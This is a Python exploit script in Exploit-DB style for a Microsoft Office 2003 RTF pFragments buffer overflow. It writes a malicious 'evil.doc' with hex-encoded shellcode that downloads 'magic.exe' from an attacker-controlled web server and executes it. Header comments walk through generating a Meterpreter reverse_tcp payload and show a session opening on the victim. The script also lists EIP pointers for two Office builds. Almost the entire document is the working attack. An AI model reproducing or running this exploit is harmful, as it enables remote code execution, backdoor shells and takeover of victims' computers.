Microsoft Office 2003 Home/Pro 0day

1. #!/usr/bin/python
2.  
3. #
4. # Note from the Exploit-DB team: This might be the same bug as:
5. # https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb
6. #
7.  
8. #-----------------------------------------------------------------------------------#
9. # Exploit: Microsoft Office 2003 Home/Pro 0day - Tested on XP SP1,2.3               #
10. # Authors: b33f (Ruben Boonen) && g11tch (Chris Hodges)                             #
11. #####################################################################################
12. # One shellcode to rule them all, One shellcode to find them, One shellcode to      #
13. # bring them all and in the darkness bind them!!                                    #
14. #                                                                                   #
15. # Greetings: offsec, corelan, setoolkit                                             #
16. #####################################################################################
17. # (1) root@bt:~/Desktop/office# ./office2003.py                                     #
18. #     root@bt:~/Desktop/office# mv evil.doc /var/www/                               #
19. #                                                                                   #
20. # (2) msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=9988 X #
21. #     > /var/www/magic.exe                                                          #
22. #                                                                                   #
23. # (3) msf  exploit(handler) > exploit                                               #
24. #                                                                                   #
25. #    [*] Started reverse handler on 192.168.111.132:9988                            #
26. #    [*] Starting the payload handler...                                            #
27. #    [*] Sending stage (752128 bytes) to 192.168.111.128                            #
28. #    [*] Meterpreter session 1 opened (192.168.111.132:9988 -> 192.168.111.128:1073)#
29. #        at 2012-01-08 18:46:26 +0800                                               #
30. #                                                                                   #
31. #    meterpreter > ipconfig                                                         #
32. #                                                                                   #
33. #    MS TCP Loopback interface                                                      #
34. #    Hardware MAC: 00:00:00:00:00:00                                                #
35. #    IP Address  : 127.0.0.1                                                        #
36. #    Netmask     : 255.0.0.0                                                        #
37. #                                                                                   #
38. #   AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport               #
39. #   Hardware MAC: 00:0c:29:6c:92:42                                                 #
40. #   IP Address  : 192.168.111.128                                                   #
41. #   Netmask     : 255.255.255.0                                                     #
42. #-----------------------------------------------------------------------------------#
43.  
44. import binascii
45.  
46. filename = "evil.doc"
47.  
48. #-----------------------------------------------------------------------------------#
49. # File Structure                                                                    #
50. #-----------------------------------------------------------------------------------#
51. file = (
52. "{\\rt##{\shp{\sp}}{\shp{\sp}}{\shp{\sp}}{\shp{\*\shpinst\shpfhdr0\shpbxcolumn\s"
53. "hpbypara\sh pwr2}{\sp{\sn {}{}{\sn}{\sn}{\*\*}pFragments}{\*\*\*}{\sv{\*\*\*\*\*"
54. "\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*}9;2;ffffffffff")
55.  
56. #-----------------------------------------------------------------------------------#
57. # Open raw socket to download payload to parent directory as "a.exe"                #
58. # ==> cmd execute "a.exe"                                                           #
59. #-----------------------------------------------------------------------------------#
60. magic = (
61. "\x65\x62\x37\x37\x33\x31\x63\x39\x36\x34\x38\x62\x37\x31\x33\x30"
62. "\x38\x62\x37\x36\x30\x63\x38\x62\x37\x36\x31\x63\x38\x62\x35\x65"
63. "\x30\x38\x38\x62\x37\x65\x32\x30\x38\x62\x33\x36\x36\x36\x33\x39"
64. "\x34\x66\x31\x38\x37\x35\x66\x32\x63\x33\x36\x30\x38\x62\x36\x63"
65. "\x32\x34\x32\x34\x38\x62\x34\x35\x33\x63\x38\x62\x35\x34\x30\x35"
66. "\x37\x38\x30\x31\x65\x61\x38\x62\x34\x61\x31\x38\x38\x62\x35\x61"
67. "\x32\x30\x30\x31\x65\x62\x65\x33\x33\x34\x34\x39\x38\x62\x33\x34"
68. "\x38\x62\x30\x31\x65\x65\x33\x31\x66\x66\x33\x31\x63\x30\x66\x63"
69. "\x61\x63\x38\x34\x63\x30\x37\x34\x30\x37\x63\x31\x63\x66\x30\x64"
70. "\x30\x31\x63\x37\x65\x62\x66\x34\x33\x62\x37\x63\x32\x34\x32\x38"
71. "\x37\x35\x65\x31\x38\x62\x35\x61\x32\x34\x30\x31\x65\x62\x36\x36"
72. "\x38\x62\x30\x63\x34\x62\x38\x62\x35\x61\x31\x63\x30\x31\x65\x62"
73. "\x38\x62\x30\x34\x38\x62\x30\x31\x65\x38\x38\x39\x34\x34\x32\x34"
74. "\x31\x63\x36\x31\x63\x33\x65\x38\x39\x32\x66\x66\x66\x66\x66\x66"
75. "\x35\x66\x38\x31\x65\x66\x39\x38\x66\x66\x66\x66\x66\x66\x65\x62"
76. "\x30\x35\x65\x38\x65\x64\x66\x66\x66\x66\x66\x66\x36\x38\x38\x65"
77. "\x34\x65\x30\x65\x65\x63\x35\x33\x65\x38\x39\x34\x66\x66\x66\x66"
78. "\x66\x66\x33\x31\x63\x39\x36\x36\x62\x39\x36\x66\x36\x65\x35\x31"
79. "\x36\x38\x37\x35\x37\x32\x36\x63\x36\x64\x35\x34\x66\x66\x64\x30"
80. "\x36\x38\x33\x36\x31\x61\x32\x66\x37\x30\x35\x30\x65\x38\x37\x61"
81. "\x66\x66\x66\x66\x66\x66\x33\x31\x63\x39\x35\x31\x35\x31\x38\x64"
82. "\x33\x37\x38\x31\x63\x36\x65\x65\x66\x66\x66\x66\x66\x66\x38\x64"
83. "\x35\x36\x30\x63\x35\x32\x35\x37\x35\x31\x66\x66\x64\x30\x36\x38"
84. "\x39\x38\x66\x65\x38\x61\x30\x65\x35\x33\x65\x38\x35\x62\x66\x66"
85. "\x66\x66\x66\x66\x34\x31\x35\x31\x35\x36\x66\x66\x64\x30\x36\x38"
86. "\x37\x65\x64\x38\x65\x32\x37\x33\x35\x33\x65\x38\x34\x62\x66\x66"
87. "\x66\x66\x66\x66\x66\x66\x64\x30\x36\x33\x36\x64\x36\x34\x32\x65"
88. "\x36\x35\x37\x38\x36\x35\x32\x30\x32\x66\x36\x33\x32\x30\x32\x30"
89. "\x36\x31\x32\x65\x36\x35\x37\x38\x36\x35\x30\x30")
90.  
91. #------------------------------------------------------------------------------------------------------------------------------#
92. # Two versions of office 2003 floating around:                                                                                 #
93. # (1) Standalone version, (2) XP Service Pack upgrade                                                                          #
94. ################################################################################################################################
95. # Unfortunatly though the exploit works perfectly for both versions they require different pointers to ESP...                  #
96. #                                                                                                                              #
97. # (1) 0x30324366 - CALL ESP - WINWORD.exe => "\x36\x36\x34\x33\x33\x32\x33\x30"                                                #
98. # => http://download.microsoft.com/download/6/2/3/6233A257-16BD-4C8D-BF4C-6FA59AF9213A/OfficeSTD.exe                           #
99. #                                                                                                                              #
100. # (2) 0x30402655 - PUSH ESP -> RETN - WINWORD.exe => "\x35\x35\x32\x36\x34\x30\x33\x30"                                        #
101. # => http://download.microsoft.com/download/7/7/8/778493c2-ace3-44c5-8bc3-d102da80e0f6/Office2003SP3-KB923618-FullFile-ENU.exe #
102. #------------------------------------------------------------------------------------------------------------------------------#
103.  
104. EIP = "\x36\x36\x34\x33\x33\x32\x33\x30" #should ascii convert the Little Endian pointer
105.  
106. filler = "\x30\x30\x30\x30\x38\x30\x37\x63"*2 + "\x41"*24 + "\x39\x30"*18
107.  
108. buffer = "\x23"*501 + "\x30\x35" + "\x30"*40 + EIP + filler + magic
109.  
110. #-----------------------------------------------------------------------------------#
111. # Since we are downloading our payload from a remote webserver there are no         #
112. # restrictions on payload size or badcharacters...                                  #
113. #-----------------------------------------------------------------------------------#
114.  
115. URL = "http://192.168.111.132/magic.exe"
116. binnu = binascii.b2a_hex(URL)
117.  
118. URL2 = "00"
119. nxt="{}}}}}}"
120. nxt+="\x0d\x0a"
121. nxt+="}"
122.  
123. textfile = open(filename , 'w')
124. textfile.write(file+buffer+binnu+URL2+nxt)
125. textfile.close()